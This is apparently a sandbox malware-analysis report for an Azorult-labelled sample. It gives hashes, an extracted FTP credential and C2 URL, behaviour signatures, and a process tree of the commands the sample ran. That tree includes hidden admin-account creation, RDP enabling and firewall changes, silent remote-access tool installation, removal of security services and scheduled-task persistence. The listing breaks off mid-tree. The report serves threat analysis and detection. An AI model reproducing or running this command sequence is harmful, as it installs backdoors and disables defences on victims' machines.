Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    06/05/2024, 18:15 UTC

General

  • Target

    Azorult.exe

  • Size

    10.0MB

  • MD5

    5df0cf8b8aa7e56884f71da3720fb2c6

  • SHA1

    0610e911ade5d666a45b41f771903170af58a05a

  • SHA256

    dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360

  • SHA512

    724ce5e285c0ec68464c39292be62b80124909e98a6f1cd4a8ddee9de24b9583112012200bf10261354de478d77a5844cb843673235db3f704a307976164669a

  • SSDEEP

    196608:NjIrZDbMLq8TKqTNNRYWzmf1e4Qx/PMPTZPkTGX9sqiL/aVvTA:N2Z4DRYWXdaZPGy9sJL/aVv

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    109.248.203.81
  • Port:
    21
  • Username:
    alex
  • Password:
    easypassword

Extracted

Family

azorult

C2

http://boglogov.site/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • UAC bypass 3 TTPs 5 IoCs
  • Windows security bypass 2 TTPs 1 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocks application from running via registry modification 13 IoCs

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 2 IoCs
  • Modifies Windows Firewall 2 TTPs 23 IoCs
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
  • Sets file to hidden 1 TTPs 3 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 4 TTPs
  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • ASPack v2.12-2.42 2 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 26 IoCs
  • Modifies file permissions 1 TTPs 62 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 7 IoCs
  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 4 IoCs
  • Drops file in Program Files directory 27 IoCs
  • Launches sc.exe 24 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 7 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • NTFS ADS 1 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Views/modifies file attributes 1 TTPs 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Azorult.exe
    "C:\Users\Admin\AppData\Local\Temp\Azorult.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • UAC bypass
    • Blocks application from running via registry modification
    • Drops file in Drivers directory
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Modifies WinLogon
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:880
    • C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2652
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2520
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Programdata\Windows\install.bat" "
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2636
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg1.reg"
            5⤵
            • UAC bypass
            • Windows security bypass
            • Runs .reg file with regedit
            PID:2880
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg2.reg"
            5⤵
            • Runs .reg file with regedit
            PID:2976
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            5⤵
            • Delays execution with timeout.exe
            PID:1128
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /silentinstall
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:2188
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /firewall
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            PID:1204
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /start
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:772
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows\*.*
            5⤵
            • Views/modifies file attributes
            PID:3044
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            5⤵
            • Views/modifies file attributes
            PID:1044
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            5⤵
            • Launches sc.exe
            PID:928
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService obj= LocalSystem type= interact type= own
            5⤵
            • Launches sc.exe
            PID:2468
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService DisplayName= "Microsoft Framework"
            5⤵
            • Launches sc.exe
            PID:2920
      • C:\ProgramData\Windows\winit.exe
        "C:\ProgramData\Windows\winit.exe"
        3⤵
        • Executes dropped EXE
        • Checks processor information in registry
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        PID:2688
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Programdata\Install\del.bat
          4⤵
            PID:1792
            • C:\Windows\SysWOW64\timeout.exe
              timeout 5
              5⤵
              • Delays execution with timeout.exe
              PID:2764
      • C:\programdata\install\cheat.exe
        C:\programdata\install\cheat.exe -pnaxui
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2280
        • C:\ProgramData\Microsoft\Intel\taskhost.exe
          "C:\ProgramData\Microsoft\Intel\taskhost.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1568
          • C:\programdata\microsoft\intel\P.exe
            C:\programdata\microsoft\intel\P.exe
            4⤵
            • Executes dropped EXE
            PID:1632
          • C:\programdata\microsoft\intel\R8.exe
            C:\programdata\microsoft\intel\R8.exe
            4⤵
            • Executes dropped EXE
            PID:844
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
              5⤵
                PID:1256
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ""C:\rdp\pause.bat" "
                  6⤵
                  • Loads dropped DLL
                  PID:2576
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im Rar.exe
                    7⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:960
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im Rar.exe
                    7⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2608
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout 3
                    7⤵
                    • Delays execution with timeout.exe
                    PID:2672
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 1251
                    7⤵
                      PID:292
                    • C:\rdp\Rar.exe
                      "Rar.exe" e -p555 db.rar
                      7⤵
                      • Executes dropped EXE
                      PID:2092
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im Rar.exe
                      7⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2132
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 2
                      7⤵
                      • Delays execution with timeout.exe
                      PID:1204
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                      7⤵
                        PID:2100
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\rdp\bat.bat" "
                          8⤵
                          • Loads dropped DLL
                          PID:2148
                          • C:\Windows\SysWOW64\reg.exe
                            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                            9⤵
                              PID:2372
                            • C:\Windows\SysWOW64\reg.exe
                              reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                              9⤵
                                PID:2308
                              • C:\Windows\SysWOW64\netsh.exe
                                netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                                9⤵
                                • Modifies Windows Firewall
                                PID:2300
                              • C:\Windows\SysWOW64\net.exe
                                net.exe user "john" "12345" /add
                                9⤵
                                  PID:1792
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 user "john" "12345" /add
                                    10⤵
                                      PID:2712
                                  • C:\Windows\SysWOW64\chcp.com
                                    chcp 1251
                                    9⤵
                                      PID:2748
                                    • C:\Windows\SysWOW64\net.exe
                                      net localgroup "Администраторы" "John" /add
                                      9⤵
                                        PID:1096
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                                          10⤵
                                            PID:2604
                                        • C:\Windows\SysWOW64\net.exe
                                          net localgroup "Administratorzy" "John" /add
                                          9⤵
                                            PID:2392
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                                              10⤵
                                                PID:2868
                                            • C:\Windows\SysWOW64\net.exe
                                              net localgroup "Administrators" John /add
                                              9⤵
                                                PID:2652
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 localgroup "Administrators" John /add
                                                  10⤵
                                                    PID:2844
                                                • C:\Windows\SysWOW64\net.exe
                                                  net localgroup "Administradores" John /add
                                                  9⤵
                                                    PID:2920
                                                    • C:\Windows\SysWOW64\net1.exe
                                                      C:\Windows\system32\net1 localgroup "Administradores" John /add
                                                      10⤵
                                                        PID:2872
                                                    • C:\Windows\SysWOW64\net.exe
                                                      net localgroup "Пользователи удаленного рабочего стола" John /add
                                                      9⤵
                                                        PID:1640
                                                        • C:\Windows\SysWOW64\net1.exe
                                                          C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                                                          10⤵
                                                            PID:1888
                                                        • C:\Windows\SysWOW64\net.exe
                                                          net localgroup "Пользователи удаленного управления" John /add
                                                          9⤵
                                                            PID:2000
                                                            • C:\Windows\SysWOW64\net1.exe
                                                              C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                                                              10⤵
                                                                PID:1680
                                                            • C:\Windows\SysWOW64\net.exe
                                                              net localgroup "Remote Desktop Users" John /add
                                                              9⤵
                                                                PID:2312
                                                                • C:\Windows\SysWOW64\net1.exe
                                                                  C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                                                                  10⤵
                                                                    PID:1924
                                                                • C:\Windows\SysWOW64\net.exe
                                                                  net localgroup "Usuarios de escritorio remoto" John /add
                                                                  9⤵
                                                                    PID:2272
                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                      C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                                                                      10⤵
                                                                        PID:2524
                                                                    • C:\Windows\SysWOW64\net.exe
                                                                      net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                                                                      9⤵
                                                                        PID:2624
                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                          C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                                                                          10⤵
                                                                            PID:1240
                                                                        • C:\rdp\RDPWInst.exe
                                                                          "RDPWInst.exe" -i -o
                                                                          9⤵
                                                                          • Sets DLL path for service in the registry
                                                                          • Executes dropped EXE
                                                                          • Modifies WinLogon
                                                                          • Drops file in Program Files directory
                                                                          • Modifies system certificate store
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2296
                                                                          • C:\Windows\system32\netsh.exe
                                                                            netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                            10⤵
                                                                            • Modifies Windows Firewall
                                                                            PID:2616
                                                                        • C:\rdp\RDPWInst.exe
                                                                          "RDPWInst.exe" -w
                                                                          9⤵
                                                                          • Executes dropped EXE
                                                                          PID:2980
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                                                                          9⤵
                                                                            PID:2368
                                                                          • C:\Windows\SysWOW64\net.exe
                                                                            net accounts /maxpwage:unlimited
                                                                            9⤵
                                                                              PID:1240
                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                C:\Windows\system32\net1 accounts /maxpwage:unlimited
                                                                                10⤵
                                                                                  PID:2624
                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                                                                                9⤵
                                                                                • Sets file to hidden
                                                                                • Drops file in Program Files directory
                                                                                • Views/modifies file attributes
                                                                                PID:868
                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                attrib +s +h "C:\Program Files\RDP Wrapper"
                                                                                9⤵
                                                                                • Sets file to hidden
                                                                                • Drops file in Program Files directory
                                                                                • Views/modifies file attributes
                                                                                PID:2812
                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                attrib +s +h "C:\rdp"
                                                                                9⤵
                                                                                • Sets file to hidden
                                                                                • Views/modifies file attributes
                                                                                PID:2076
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout 2
                                                                            7⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:928
                                                                    • C:\ProgramData\Microsoft\Intel\winlog.exe
                                                                      C:\ProgramData\Microsoft\Intel\winlog.exe -p123
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      PID:352
                                                                      • C:\ProgramData\Microsoft\Intel\winlogon.exe
                                                                        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:2860
                                                                        • C:\Windows\system32\cmd.exe
                                                                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8DFD.tmp\8DFE.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
                                                                          6⤵
                                                                            PID:2188
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
                                                                              7⤵
                                                                              • Drops file in System32 directory
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:320
                                                                      • C:\Programdata\RealtekHD\taskhostw.exe
                                                                        C:\Programdata\RealtekHD\taskhostw.exe
                                                                        4⤵
                                                                        • Modifies visiblity of hidden/system files in Explorer
                                                                        • Executes dropped EXE
                                                                        • Adds Run key to start application
                                                                        • NTFS ADS
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                        PID:1952
                                                                        • C:\Programdata\WindowsTask\winlogon.exe
                                                                          C:\Programdata\WindowsTask\winlogon.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:3064
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /C schtasks /query /fo list
                                                                            6⤵
                                                                              PID:2548
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /query /fo list
                                                                                7⤵
                                                                                  PID:1808
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c ipconfig /flushdns
                                                                              5⤵
                                                                                PID:1692
                                                                                • C:\Windows\system32\ipconfig.exe
                                                                                  ipconfig /flushdns
                                                                                  6⤵
                                                                                  • Gathers network information
                                                                                  PID:2676
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c gpupdate /force
                                                                                5⤵
                                                                                  PID:1156
                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                    gpupdate /force
                                                                                    6⤵
                                                                                      PID:468
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
                                                                                  4⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:2996
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
                                                                                  4⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:1256
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c C:\programdata\microsoft\temp\H.bat
                                                                                  4⤵
                                                                                  • Drops file in Drivers directory
                                                                                  PID:1444
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c C:\programdata\microsoft\temp\Temp.bat
                                                                                  4⤵
                                                                                    PID:3048
                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                      TIMEOUT /T 5 /NOBREAK
                                                                                      5⤵
                                                                                      • Delays execution with timeout.exe
                                                                                      PID:296
                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                      TIMEOUT /T 3 /NOBREAK
                                                                                      5⤵
                                                                                      • Delays execution with timeout.exe
                                                                                      PID:2228
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      TASKKILL /IM 1.exe /T /F
                                                                                      5⤵
                                                                                      • Kills process with taskkill
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2664
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      TASKKILL /IM P.exe /T /F
                                                                                      5⤵
                                                                                      • Kills process with taskkill
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1664
                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                      ATTRIB +H +S C:\Programdata\Windows
                                                                                      5⤵
                                                                                      • Views/modifies file attributes
                                                                                      PID:2536
                                                                              • C:\programdata\install\ink.exe
                                                                                C:\programdata\install\ink.exe
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:2884
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c sc start appidsvc
                                                                                2⤵
                                                                                  PID:3000
                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                    sc start appidsvc
                                                                                    3⤵
                                                                                    • Launches sc.exe
                                                                                    PID:2672
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c sc start appmgmt
                                                                                  2⤵
                                                                                    PID:2552
                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                      sc start appmgmt
                                                                                      3⤵
                                                                                      • Launches sc.exe
                                                                                      PID:2720
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
                                                                                    2⤵
                                                                                      PID:2484
                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                        sc config appidsvc start= auto
                                                                                        3⤵
                                                                                        • Launches sc.exe
                                                                                        PID:2692
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
                                                                                      2⤵
                                                                                        PID:2512
                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                          sc config appmgmt start= auto
                                                                                          3⤵
                                                                                          • Launches sc.exe
                                                                                          PID:2392
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c sc delete swprv
                                                                                        2⤵
                                                                                          PID:1920
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            sc delete swprv
                                                                                            3⤵
                                                                                            • Launches sc.exe
                                                                                            PID:2492
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c sc stop mbamservice
                                                                                          2⤵
                                                                                            PID:776
                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                              sc stop mbamservice
                                                                                              3⤵
                                                                                              • Launches sc.exe
                                                                                              PID:2744
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
                                                                                            2⤵
                                                                                              PID:2624
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                sc stop bytefenceservice
                                                                                                3⤵
                                                                                                • Launches sc.exe
                                                                                                PID:2880
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
                                                                                              2⤵
                                                                                                PID:2364
                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                  sc delete bytefenceservice
                                                                                                  3⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:2360
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c sc delete mbamservice
                                                                                                2⤵
                                                                                                  PID:2024
                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                    sc delete mbamservice
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:2104
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sc delete crmsvc
                                                                                                  2⤵
                                                                                                    PID:1096
                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                      sc delete crmsvc
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:2412
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c sc delete "windows node"
                                                                                                    2⤵
                                                                                                      PID:2328
                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                        sc delete "windows node"
                                                                                                        3⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:3060
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
                                                                                                      2⤵
                                                                                                        PID:576
                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                          sc stop Adobeflashplayer
                                                                                                          3⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:596
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
                                                                                                        2⤵
                                                                                                          PID:1488
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            sc delete AdobeFlashPlayer
                                                                                                            3⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:2076
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c sc stop MoonTitle
                                                                                                          2⤵
                                                                                                            PID:1664
                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                              sc stop MoonTitle
                                                                                                              3⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:1612
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
                                                                                                            2⤵
                                                                                                              PID:1144
                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                sc delete MoonTitle"
                                                                                                                3⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:1944
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c sc stop AudioServer
                                                                                                              2⤵
                                                                                                                PID:448
                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                  sc stop AudioServer
                                                                                                                  3⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:1000
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c sc delete AudioServer"
                                                                                                                2⤵
                                                                                                                  PID:2220
                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                    sc delete AudioServer"
                                                                                                                    3⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:2152
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
                                                                                                                  2⤵
                                                                                                                    PID:1556
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc stop clr_optimization_v4.0.30318_64
                                                                                                                      3⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:2796
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
                                                                                                                    2⤵
                                                                                                                      PID:3008
                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                        sc delete clr_optimization_v4.0.30318_64"
                                                                                                                        3⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:2924
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
                                                                                                                      2⤵
                                                                                                                        PID:1752
                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                          sc stop MicrosoftMysql
                                                                                                                          3⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:2216
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
                                                                                                                        2⤵
                                                                                                                          PID:904
                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                            sc delete MicrosoftMysql
                                                                                                                            3⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:2820
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
                                                                                                                          2⤵
                                                                                                                            PID:376
                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                              netsh advfirewall set allprofiles state on
                                                                                                                              3⤵
                                                                                                                              • Modifies Windows Firewall
                                                                                                                              PID:2380
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                                            2⤵
                                                                                                                              PID:1348
                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                                                3⤵
                                                                                                                                • Modifies Windows Firewall
                                                                                                                                PID:2776
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                                              2⤵
                                                                                                                                PID:2084
                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                  netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                                                  3⤵
                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                  PID:1940
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                                                2⤵
                                                                                                                                  PID:2756
                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
